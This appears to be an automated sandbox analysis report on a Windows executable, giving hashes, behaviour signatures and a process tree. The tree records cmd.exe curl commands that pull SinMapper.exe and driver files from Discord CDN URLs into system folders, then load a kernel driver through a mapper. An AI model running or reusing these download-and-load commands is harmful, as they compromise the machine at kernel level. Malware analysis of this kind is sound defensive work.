Overview

overview

8

Static

static

3

9f131b4fce...4c.exe

windows7-x64

5

9f131b4fce...4c.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    30/08/2023, 04:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe

  • Size

    5.3MB

  • MD5

    6194ffd6e8c888145a9ffc3bb69b0b55

  • SHA1

    531e8103d924ec7f19d556e96f420a3f63d6a77b

  • SHA256

    9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c

  • SHA512

    abf73145492cc3ad0a422535dede9eb5d616beb9edc590de7ed7d1a3768068e0aeb2433f98085b06fd9d606024b4e7c91987009b58aa2b7f0561045c8839cade

  • SSDEEP

    98304:Gdru8uev2g3IPDNSZIolNh/yJydF06XeDBVeCZUinzInJ5+bkrKx1B3NWiOxH:GFGIWb8ZIeNTdF06KBVeQUT+bO61BdWF

Score
5/10

Malware Config

Signatures

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe
    "C:\Users\Admin\AppData\Local\Temp\9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2196
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1145811432676536420/1146174457786925167/SinMapper.exe -o C:\Windows\IME\SinMapper.exe
      2⤵
        PID:2856
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1145811432676536420/1146174740302680204/mapper.sys -o C:\Windows\IME\mapper.sys
        2⤵
          PID:2292
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1145811432676536420/1146175240288882698/mlx4_bus.sys --silent -o C:\Windows\System32\drivers\warehub.sys
          2⤵
            PID:2808
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /C C:\Windows\IME\SinMapper.exe C:\Windows\IME\mapper.sys warehub.sys .data
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1264
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /C C:\Windows\IME\SinMapper.exe C:\Windows\IME\mapper.sys warehub.sys .data
              3⤵
                PID:2984
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c cls
              2⤵
                PID:2988

            Network

            MITRE ATT&CK Matrix

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/2196-3-0x0000000077E50000-0x0000000077E52000-memory.dmp

              Filesize

              8KB

              Download

            • memory/2196-2-0x000000013F890000-0x000000014016F000-memory.dmp

              Filesize

              8.9MB

              Download

            • memory/2196-0-0x0000000077E50000-0x0000000077E52000-memory.dmp

              Filesize

              8KB

              Download

            • memory/2196-6-0x0000000077CA0000-0x0000000077E49000-memory.dmp

              Filesize

              1.7MB

              Download

            • memory/2196-5-0x0000000077E50000-0x0000000077E52000-memory.dmp

              Filesize

              8KB

              Download

            • memory/2196-7-0x0000000077E60000-0x0000000077E62000-memory.dmp

              Filesize

              8KB

              Download

            • memory/2196-9-0x0000000077E60000-0x0000000077E62000-memory.dmp

              Filesize

              8KB

              Download

            • memory/2196-11-0x0000000077E60000-0x0000000077E62000-memory.dmp

              Filesize

              8KB

              Download

            • memory/2196-12-0x000000013F890000-0x000000014016F000-memory.dmp

              Filesize

              8.9MB

              Download

            • memory/2196-14-0x00000000000F0000-0x00000000000F1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2196-15-0x0000000000180000-0x0000000000181000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2196-16-0x0000000000290000-0x0000000000291000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2196-17-0x00000000002B0000-0x00000000002B1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2196-18-0x000000013F890000-0x000000014016F000-memory.dmp

              Filesize

              8.9MB

              Download

            • memory/2196-19-0x0000000077CA0000-0x0000000077E49000-memory.dmp

              Filesize

              1.7MB

              Download